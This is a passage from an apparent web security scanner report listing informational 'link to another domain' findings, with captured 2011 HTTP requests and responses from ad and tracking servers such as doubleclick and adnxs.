User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:08 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Content-Length: 1178
X-Server-Name: dv-c1-r1-u7-b2
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
X-Pad: avoid browser bug

document.write('\x3Cdiv\x20id\x3D\x27ad_07\x27\x20class\x3D\x27callout\x27\x3E');document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="468" height="60">');
document.write('<param name="movie" value="http://media.indianasnewscenter.com/casflash/468x60MayJune.swf?clickTAG=http%3A%2F%2Fcas.clickability.com%2Fcac%3Fa%3D404129%26n%3D225574%26d%3D654194%26c
...[SNIP]...
<param name="bgcolor" value="#ffffff" />');
document.write('<embed src="http://media.indianasnewscenter.com/casflash/468x60MayJune.swf?c=y&clickTAG=http%3A%2F%2Fcas.clickability.com%2Fcac%3Fa%3D404129%26n%3D225574%26d%3D654194%26c%3D3031" quality="high" wmode="transparent" width="468" height="60" name="ad_07_Parkview_May_June" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />');
document.write('</object>
...[SNIP]...
15.19. http://cas.clickability.com/cas/cas.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /cas/cas.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cas/cas.js?r=0.6105569114442915&p=1456&c=3031&m=11854&d=654194&pre=%3Cdiv+id%3D%27ad_11%27+class%3D%27callout%27%3E&post=%3C%2Fdiv%3E HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:09 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Content-Length: 428
X-Server-Name: dv-c1-r3-u7-b2
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
X-Pad: avoid browser bug

document.write('\x3Cdiv\x20id\x3D\x27ad_11\x27\x20class\x3D\x27callout\x27\x3E'); document.write('<a href="http://cas.clickability.com/cac?a=402639&n=224804&d=654194&c=3031" target="_blank" id="cmSK-placement-1456" cmSKpID="1456" cmSKcID="224804" cmSKaID="402639"><img src="http://media.indianasnewscenter.com/casimages/TRAALC_WebBanner300x250.jpg" border="0" height="250" width="300" /></a>
...[SNIP]...
15.20. http://choices.truste.com/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&js=2 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:38 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 11295

truste.ca.addClearAdIcon=function(c){var d="te-clearads-js";if(!truste.ca[c.baseName+"_bi"]){truste.ca[c.baseName+"_bi"]=c
}var a=document.getElementById(c.containerId);if(!a){var e=document.getElemen
...[SNIP]...
</span>';
var f='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash4/cabs/swflash.cab#version=4,0,0,0" id="tecafi" width="77" height="16" style="position: relative"><param name="flashVars" value="bindingId='+k.baseName+'_bi"/>
...[SNIP]...
15.21. http://choices.truste.com/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:34 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3759

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
<hr />\n <a href="http://bit.ly/dKnbdp" target="_blank">Online Privacy Library &raquo;</a>
...[SNIP]...
<hr />\n <a href="http://bit.ly/ffdQkR" target="_blank">AT&amp;T Privacy FAQ &raquo;</b>
...[SNIP]...
15.22. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:05 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&amp;pid=18&amp;uid=CAESEA4m3NbIVFSubIriNyJB6xg&amp;cver=1">here</A>
...[SNIP]...
15.23. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 13:59:44 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&amp;cver=1">here</A>
...[SNIP]...
15.24. http://gannett.gcion.com/addyn/3.0/5111.1/896067/0/-1/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/896067/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn/3.0/5111.1/896067/0/-1/ADTECH;alias=fl-brevard.flatoday.com/news/article.htm_88x31_1;cookie=info;loc=100;target=_blank;grp=24711;misc=1304949608179;size=88x31;noperf=1;key=Highly+publicized+murder+Caylee+Anthony+rivets+enrages;kvcw=;kvtitle=Highly-publicized-murder-of-Caylee-Anthony-rivets%2C-enrages HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slwalgreens=true; rsi_segs=D08734_70008|D08734_72078; CfP=1; JEB2=4DC7E58B6E651A440C6EAF39F000181A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 513

document.write('<a href="http://gannett.gcion.com/?adlink/5111/169190/0/13/AdId=516875;BnId=3;itime=949616572;key=Highly+publicized+murder+Caylee+Anthony+rivets+enrages;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/267/Ad516875St1Sz13Sq20046904V0Id3.gif" border=0 alt=" " width="88" height="31"></a>
...[SNIP]...
15.25. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ab?enc=zszMzMzM_D_5U-Olm8T4PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAAcC4a9AAAAAA.&tt_code=4455744&udj=uf%28%27a%27%2C+10005%2C+1304949637%29%3Buf%28%27c%27%2C+47078%2C+1304949637%29%3Buf%28%27r%27%2C+327251%2C+1304949637%29%3Bppv%289163%2C+%274297476271584241789%27%2C+1304949637%2C+1305122437%2C+47078%2C+49165%29%3B&cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQC&referrer=http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8&pp=1.30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:00:24 GMT
Content-Length: 1491

document.write('<a href="http://ib.adnxs.com/click/DPqCvqAv-D_NzMzMzMz0PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BA
...[SNIP]...
</a><img src="http://xcdn.xgraph.net/17572/ae/xg.gif?type=ae&ais=ApN&pid=17572&cid=H26G&n_cid=47078&crid=300x250_8F_Interim_finalgif&n_crid=327251&mpm=CPM&n_g=u&n_a=0&aids=H26G-8&n_price=1.511628&n_bust=1304949616&n=http%3A%2F%2Fdata.cmcore.com%2Fimp%3Ftid%3D17%26ci%3D90074784%26vn1%3D4.1.1%26vn2%3De4.0%26ec%3DUTF-8%26cm_mmc%3DIM_Display-_-x-_-x15off-_-postvday%26cm_mmca1%3D300x250%26cm_mmca2%3D300x250_8F_Interim_finalgif%26cm_mmca3%3Dpostvday%26cm_mmca4%3D25K" width="1" height="1"/><img src="http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/2724386019227846218/gif?meta=appNexus" width="1" height="1"/>');
15.26. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /if?enc=XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAgMCAAUAAAAAOCNlQgAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949676%29%3Buf%28%27r%27%2C+184995%2C+1304949676%29%3B&cnd=!Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; sess=1; uuid2=2724386019227846218; icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:01:25 GMT
Content-Length: 530

<script language="JavaScript" src="http://mf.sitescout.com/tag.jsp?pid=0C66F16&w=728&h=90&rnd=1304949683&cm=http://ib.adnxs.com/click/XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAQMCAAUAAAAANyNUQgAAAAA./cnd=!Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc="></script>
15.27. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
